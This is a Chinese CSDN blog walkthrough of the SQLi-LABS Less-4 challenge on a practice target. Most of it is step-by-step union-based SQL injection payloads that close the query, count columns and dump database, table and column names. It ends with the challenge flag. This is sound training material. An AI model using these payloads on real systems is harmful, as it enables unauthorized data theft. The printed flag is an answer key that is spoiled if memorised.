sqli-labs
1
点击启动靶机。
SQLi-LABS Page-1(Basic Challenges)
解法
发送 GET 请求,id 作为参数。
http://b38e0f15-7e65-40e6-abf2-fc99e50b38e4.node5.buuoj.cn/Less-4/?id=1
返回了用户名和密码。
?id=1'
正常输出。
?id=1"
发生报错。
构造闭合:
?id=1"); --+
正常输出。
判断列数:
?id=1") order by 1,2,3; --+
?id=1") order by 1,2,3,4; --+
到4时报错,有三列。
判断输出位置:
?id=-1") union select 1,2,3; --+
爆库名:
?id=-1") union select 1,2,group_concat(schema_name) from information_schema.schemata; --+
有个 ctftraining 库。
爆表名:
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'; --+
有个 flag 表。
爆列名:
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='ctftraining'; --+
查询 flag:
?id=-1") union select 1,2,flag from ctftraining.flag; --+
Flag
flag{6baf6140-4646-4f31-bb61-e42b13de98a1}
声明
本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规。
博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规,不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任。
标签:union,闭合,flag,报错,--+,注入,id,select,schema From: https://blog.csdn.net/qq_34988204/article/details/138638974